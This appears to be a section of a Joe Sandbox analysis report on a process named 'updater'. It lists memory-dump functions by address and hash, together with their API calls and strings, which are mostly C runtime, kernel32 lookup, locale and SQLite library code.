Instruction ID: 698f84a7ffe9b98623d63eea2725d942d72fe13c5b429c55c006eeee41ce8102
Opcode Fuzzy Hash: e2528de3e37a2383c09b2fcbedb639cb2713642eff2bb648f9967f84f8b08b7f
Instruction Fuzzy Hash: CF117363F30C255A675C816A8C172BAA5D2EFD815070F533EE826E7284E9A4DE23D390

Uniqueness

Uniqueness Score: -1.00%

Function 01420F70 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9d11b53c451f994349c24871a31ca4bd321ef44e46fa27aba89222af785211f5
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: BD110BB73811B143E614CA3DC4B4ABBDBD5EAC5221BAE4277F2424BB74D27691C59900

Uniqueness

Uniqueness Score: -1.00%

Function 013C72BC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dfd36b36dbd786164a676da5fe0137754c35f73489f3e06c4e513949f896c59
Instruction ID: 4610ff5a54370b93b270bf6a090dc09f213b5ce3b73348bb96271c827ff62d89
Opcode Fuzzy Hash: 0dfd36b36dbd786164a676da5fe0137754c35f73489f3e06c4e513949f896c59
Instruction Fuzzy Hash: D52196315250B10AC75C863AA822437BF909B8720738F42AFEFC7ED4C7D529D560DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0141CEA8 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0141CEAE
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0141CEBC
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0141CECD
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0141CEDE
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0141CEEF
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0141CF00
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0141CF11
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0141CF22
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0141CF33
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0141CF44
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0141CF55
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0141CF66
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0141CF77
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0141CF88
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0141CF99
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0141CFAA
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0141CFBB
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0141CFCC
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0141CFDD
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0141CFEE
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0141CFFF
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0141D010
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0141D021
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0141D032
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0141D043
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0141D054
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0141D065
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0141D076
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0141D087
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0141D098
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0141D0A9
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0141D0BA
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0141D0CB
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0141D0DC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0141D0ED
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0141D0FE
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0141D10F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0141D120
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0141D131
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0141D142
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0141D153

Strings

FlsGetValue, xrefs: 0141CED3
TryAcquireSRWLockExclusive, xrefs: 0141D0C0
CloseThreadpoolWait, xrefs: 0141CFB0
WakeAllConditionVariable, xrefs: 0141D07C
FlsFree, xrefs: 0141CEC2
CreateThreadpoolWork, xrefs: 0141D0F3
GetCurrentPackageId, xrefs: 0141D005
GetSystemTimePreciseAsFileTime, xrefs: 0141D049
GetCurrentProcessorNumber, xrefs: 0141CFE3
FlushProcessWriteBuffers, xrefs: 0141CFC1
FreeLibraryWhenCallbackReturns, xrefs: 0141CFD2
CreateThreadpoolTimer, xrefs: 0141CF4A
SleepConditionVariableCS, xrefs: 0141D08D
GetTickCount64, xrefs: 0141D016
CreateSemaphoreExW, xrefs: 0141CF39
SleepConditionVariableSRW, xrefs: 0141D0E2
ReleaseSRWLockExclusive, xrefs: 0141D0D1
InitializeConditionVariable, xrefs: 0141D05A
GetFileInformationByHandleEx, xrefs: 0141D027
FlsAlloc, xrefs: 0141CEB6
GetLocaleInfoEx, xrefs: 0141D137
CloseThreadpoolWork, xrefs: 0141D115
SetFileInformationByHandle, xrefs: 0141D038
InitializeCriticalSectionEx, xrefs: 0141CEF5
CreateEventExW, xrefs: 0141CF17
AcquireSRWLockExclusive, xrefs: 0141D0AF
SubmitThreadpoolWork, xrefs: 0141D104
CompareStringEx, xrefs: 0141D126
SetThreadpoolWait, xrefs: 0141CF9F
WaitForThreadpoolTimerCallbacks, xrefs: 0141CF6C
CreateSymbolicLinkW, xrefs: 0141CFF9
LCMapStringEx, xrefs: 0141D148
CreateThreadpoolWait, xrefs: 0141CF8E
InitializeSRWLock, xrefs: 0141D09E
InitOnceExecuteOnce, xrefs: 0141CF06
CreateSemaphoreW, xrefs: 0141CF28
FlsSetValue, xrefs: 0141CEE4
SetThreadpoolTimer, xrefs: 0141CF5B
WakeConditionVariable, xrefs: 0141D06B
CloseThreadpoolTimer, xrefs: 0141CF7D
kernel32.dll, xrefs: 0141CEA9

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 5808a20fa129f0a15de0578d967be0217387e7209ca70e2403af8379460c0a4f
Instruction ID: 5be516526c17961311ff5b0237433c1be43e463b98d01025a046975c0e6fc1f9
Opcode Fuzzy Hash: 5808a20fa129f0a15de0578d967be0217387e7209ca70e2403af8379460c0a4f
Instruction Fuzzy Hash: 79619DFA953761ABE7305FF6F80D8863AA8BB19B0B320041BF219D217DDBB540468F55

Uniqueness

Uniqueness Score: -1.00%

Function 0141AC8A Relevance: 46.8, APIs: 31, Instructions: 287COMMONLIBRARYCODE

Download Yara Rule

APIs

collate.LIBCPMT ref: 0141AC9A

Part of subcall function 014199C6: __EH_prolog3_GS.LIBCMT ref: 014199CD
Part of subcall function 014199C6: __Getcoll.LIBCPMT ref: 01419A31

__Getcoll.LIBCPMT ref: 0141ACE0
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141ACF4
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AD09
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AD5A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AE8F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AEA2
int.LIBCPMT ref: 0141AEAF
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AEBF
int.LIBCPMT ref: 0141AECC
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AEDC
int.LIBCPMT ref: 0141AEE9
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AEF9
int.LIBCPMT ref: 0141ACBA

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

int.LIBCPMT ref: 0141AD1D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AD47
int.LIBCPMT ref: 0141AD72
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141ADA0
int.LIBCPMT ref: 0141ADAD
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141ADD4
int.LIBCPMT ref: 0141ADE1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AE31
int.LIBCPMT ref: 0141AE3E
int.LIBCPMT ref: 0141AF11
numpunct.LIBCPMT ref: 0141AF38
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AF48
int.LIBCPMT ref: 0141AF55
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AF8C
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AF9F
int.LIBCPMT ref: 0141AFAC
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AFBC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$H_prolog3_Lockit::_Lockit::~_collatenumpunct
String ID:
API String ID: 4289308570-0
Opcode ID: 351f0fcdbf787430a2b36799852e5082a89a250c3ff330fe0afca88272667f8a
Instruction ID: 6f701371f3b6f2db38cda7fc549bfcf6abc35572afff1b71eb49df7ea90e197f
Opcode Fuzzy Hash: 351f0fcdbf787430a2b36799852e5082a89a250c3ff330fe0afca88272667f8a
Instruction Fuzzy Hash: 7291EBB1D023536BEB116FB64C44A7F7AA8FF71A64F14441FF949A72A5EB308D0083A1

Uniqueness

Uniqueness Score: -1.00%

Function 01426BA0 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01426C0F
_free.LIBCMT ref: 01426C25
_free.LIBCMT ref: 01426C38
_free.LIBCMT ref: 01426C4D
_free.LIBCMT ref: 01426C62
GetCPInfo.KERNEL32(?,?), ref: 01426CAC

Part of subcall function 01434D02: _free.LIBCMT ref: 01434D6D

_free.LIBCMT ref: 01426F17
_free.LIBCMT ref: 01426F2A
_free.LIBCMT ref: 01426F38
_free.LIBCMT ref: 01426F43
_free.LIBCMT ref: 01426F85
_free.LIBCMT ref: 01426F8D
_free.LIBCMT ref: 01426F93
_free.LIBCMT ref: 01426F9B
_free.LIBCMT ref: 01426FA9

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: a97d45bd3c368b76aa4a5cba375ae4dbea9015448399ff9a1dbec5f2e40ee2db
Instruction ID: fb871daa616c7630ca0073dadf73d47e88f538318d6ed76039ebc8ef905281ee
Opcode Fuzzy Hash: a97d45bd3c368b76aa4a5cba375ae4dbea9015448399ff9a1dbec5f2e40ee2db
Instruction Fuzzy Hash: 89D1CE71D002169FEF21CFA9C880BEEBBF4FF58300F45416EE995A73A1D671A9818B50

Uniqueness

Uniqueness Score: -1.00%

Function 013F972D Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 299COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013F99FA

Part of subcall function 013FDA52: _strlen.LIBCMT ref: 013FDB9D

Part of subcall function 013F88F3: _strlen.LIBCMT ref: 013F8929

_strlen.LIBCMT ref: 013F9A37

Strings

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d, xrefs: 013F995F
TABLE, xrefs: 013F982E
VIEW, xrefs: 013F9833, 013F9917
sqlite_master, xrefs: 013F993E
sqlite_temp_master, xrefs: 013F994D, 013F9958
tbl_name='%q', xrefs: 013F99A6
CREATE TABLE %Q.sqlite_sequence(name,seq), xrefs: 013F9996
view, xrefs: 013F983B
CREATE %s %.*s, xrefs: 013F9918

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$TABLE$UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$sqlite_master$sqlite_temp_master$tbl_name='%q'$view
API String ID: 4218353326-3984390951
Opcode ID: a0c1e47d6cd70142f16e4eaa41c1c96757a87e4dde364330e723d3fc57ec9bba
Instruction ID: 9c65c9d2bfd7fc836abda0339863e25be764065f19c0df852d595c622b8f4b0d
Opcode Fuzzy Hash: a0c1e47d6cd70142f16e4eaa41c1c96757a87e4dde364330e723d3fc57ec9bba
Instruction Fuzzy Hash: 4FB19570A00215EFEF14DFA8C885BAEBBB5FF84318F10815DEA05AB291DB71A945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0143931A Relevance: 18.4, APIs: 12, Instructions: 374COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01439362
_free.LIBCMT ref: 01439386
_free.LIBCMT ref: 01439393
_free.LIBCMT ref: 014393B8
_free.LIBCMT ref: 014393C5
_free.LIBCMT ref: 014393CE
_free.LIBCMT ref: 014396A9
_free.LIBCMT ref: 014396B1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcb295eaf332e5ed26c425019d2c25ed4d972429ee0467fd3931d0a212f1ab4b
Instruction ID: a650454dd892880b008c507372fde9552a2d53cb6accc1b52727e10525eef8eb
Opcode Fuzzy Hash: dcb295eaf332e5ed26c425019d2c25ed4d972429ee0467fd3931d0a212f1ab4b
Instruction Fuzzy Hash: 54C155B2D41205AFDB20DBA9DC86FDE77F8AB6C704F14016AFA04FB291D6B09D418B54

Uniqueness

Uniqueness Score: -1.00%

Function 013ED212 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 168COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013ED324
_strlen.LIBCMT ref: 013ED350

Strings

collseq(%.20s), xrefs: 013ED2D8
%s(%d), xrefs: 013ED2F8
%lld, xrefs: 013ED272
,..., xrefs: 013ED3DD
keyinfo(%d, xrefs: 013ED316
,nil, xrefs: 013ED3AC
vtab:%p:%p, xrefs: 013ED248
%.16g, xrefs: 013ED260

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: %.16g$%lld$%s(%d)$,...$,nil$collseq(%.20s)$keyinfo(%d$vtab:%p:%p
API String ID: 4218353326-1567635944
Opcode ID: 59c8ee657645074e84788ba385f226bf59e7b8256650185bbbe2ec2155be930d
Instruction ID: a085d27b6abd5a928bfff0d4d0f440cf4a99f53edbdabffe32d870674e0affd9
Opcode Fuzzy Hash: 59c8ee657645074e84788ba385f226bf59e7b8256650185bbbe2ec2155be930d
Instruction Fuzzy Hash: EA51F370900715AFDB15CFDDC888EAA7BE4BF4522CF24429AE5219F2E2D771D942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013C7521 Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 013C7535
GetFileSize.KERNEL32(?,00000000,?,?), ref: 013C75B5
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 013C75CC
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 013C75DF
SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 013C75EC
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 013C75FF
SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 013C7620
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 013C7633

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: ac5c8ebf119fcffdcf2fdd0382af30bbe9c2ed36a568cce79734315a0ec6f1b1
Instruction ID: 054da792c31235c25a8318d416f021b247b7e242138b4a72b555b3f32fef8706
Opcode Fuzzy Hash: ac5c8ebf119fcffdcf2fdd0382af30bbe9c2ed36a568cce79734315a0ec6f1b1
Instruction Fuzzy Hash: 2A5164B5A01219ABEB24DF69DC81FBEB7B9EB44B54F10482DFA05E7280D630DD058B60

Uniqueness

Uniqueness Score: -1.00%

Function 014213F0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 014214EB
type_info::operator==.LIBVCRUNTIME ref: 01421512
___TypeMatch.LIBVCRUNTIME ref: 0142161E
IsInExceptionSpec.LIBVCRUNTIME ref: 014216F9
_UnwindNestedFrames.LIBCMT ref: 01421780
CallUnexpected.LIBVCRUNTIME ref: 0142179B

Strings

csm, xrefs: 01421549
csm, xrefs: 01421498
csm, xrefs: 0142142B

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: d1e64e02a2a071d2739358abd4cdc8b1c7fe0c66a0fd43179549d3a5b623f89d
Instruction ID: ab502c4b1df628078b0252a51e2f810affc0851198b9dcbf4fd6e56e85a842a6
Opcode Fuzzy Hash: d1e64e02a2a071d2739358abd4cdc8b1c7fe0c66a0fd43179549d3a5b623f89d
Instruction Fuzzy Hash: 81C19B75D0022A9FCF25DFA9C8809AFBBB5BF94B10F84405BE9056B321D731D992CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01430383 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01430399

Part of subcall function 01430123: HeapFree.KERNEL32(00000000,00000000), ref: 01430139
Part of subcall function 01430123: GetLastError.KERNEL32(?,?,0142DA9C), ref: 0143014B

_free.LIBCMT ref: 014303A5
_free.LIBCMT ref: 014303B0
_free.LIBCMT ref: 014303BB
_free.LIBCMT ref: 014303C6
_free.LIBCMT ref: 014303D1
_free.LIBCMT ref: 014303DC
_free.LIBCMT ref: 014303E7
_free.LIBCMT ref: 014303F2
_free.LIBCMT ref: 01430400

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a1574bf245171d0cb07f26318e618c122df8303bb4e2346caa85fcce9959273a
Instruction ID: d036dbab2b262bf1fad574f7c34312b4171349f504263ebb6c1460bde6c16ac9
Opcode Fuzzy Hash: a1574bf245171d0cb07f26318e618c122df8303bb4e2346caa85fcce9959273a
Instruction Fuzzy Hash: 7E21B776904109AFCF01EF95D890DDE7BB8BF68350F0152AAF5159B130DB72EA44CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013F706C Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 218COMMON

Download Yara Rule

APIs

Part of subcall function 013F8615: _strlen.LIBCMT ref: 013F865A

Part of subcall function 013F86CA: _strlen.LIBCMT ref: 013F871F

_strlen.LIBCMT ref: 013F710B

Strings

sqlite_, xrefs: 013F7118
sqlite_master, xrefs: 013F722C, 013F7234
sqlite_temp_master, xrefs: 013F7221
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;, xrefs: 013F7282
UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q, xrefs: 013F7261
sqlite_sequence, xrefs: 013F7249
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q, xrefs: 013F7238

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q$UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q$UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;$sqlite_$sqlite_master$sqlite_sequence$sqlite_temp_master
API String ID: 4218353326-1520438555
Opcode ID: 2d47bd10dd57dfc68278ae9b83e621a28611d9d8ab42f54ae0a77457dfce0aef
Instruction ID: 03a89968bdd1d2e9626f07fddc1283b47c3396a8cc1f91402e4126c3b48d85fa
